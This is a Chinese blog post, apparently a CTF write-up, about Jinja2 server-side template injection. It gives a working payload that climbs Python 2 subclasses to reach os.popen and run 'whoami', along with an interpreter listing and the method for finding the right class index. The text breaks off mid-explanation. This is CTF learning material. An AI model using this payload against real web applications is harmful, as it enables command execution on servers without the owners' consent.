Jinja2 模板注入&模板内命令执行

最新推荐文章于 2025-06-15 22:28:02 发布

PD_3569

最新推荐文章于 2025-06-15 22:28:02 发布

阅读量2.2k

点赞数

CC 4.0 BY-SA版权

分类专栏： CTF

本文链接：https://blog.youkuaiyun.com/qq_33020901/article/details/79535629

CTF 专栏收录该内容

20 篇文章

订阅专栏

本文介绍了一种利用Jinja2模板引擎进行注入攻击的方法，并通过构造特定的payload来获取目标系统的whoami信息。作者首先分析了Python2环境中可用的类及其子类，进而找到了可以执行命令的路径。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

原因：

ichunqiu 的web中有一个 Musee de X ，知道 http:// 文件能获取，但是没有想到 file:// 获取文件，根据报错也没有想过他用的是 jinja2。后来朋友说payload每个环境可能不太一样，就自己尝试了一波。

分析：

这是 python2 运行的，结果就是输出 whoami 的信息

#code:utf-8

from jinja2 import Template
import sys
reload(sys) 
sys.setdefaultencoding('utf8')


a = Template("{{[].__class__.__base__.__subclasses__()[60].__init__.func_globals['linecache'].__dict__['os'].__dict__['popen']('whoami').read()}}")
print(a.render())

开始我用 python3 逐步输出，然后发现怎么都不行，还是太菜 ... 用 python2 一会儿就行了 ...

C:\Users\shark\Desktop>python2
Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:25:58) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> [].__class__.__base__.__subclasses__()
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, 
<type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, 
<type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, 
<type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, 
<type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'sys.getwindowsversion'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, 
<type 'nt.stat_result'>, <type 'nt.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, 
<class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type 'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.methodcaller'>, <type 'functools.partial'>, <type 'MultibyteCodec'>, <type 'MultibyteIncrementalEncoder'>, <type 'MultibyteIncrementalDecoder'>, <type 'MultibyteStreamReader'>, <type 'MultibyteStreamWriter'>]

发现输出很多类名，根据猜测为 import 的类和内置的类。

于是猜测 payload 为类名.方法格式

但是我不知道题目用的是那个类，于是构造

[].__class__.__base__.__subclasses__()[59]

去获取题目用的类名发现为

<class 'warnings.catch_warnings'>

于是找到自己对应类的序号，然后在本地构造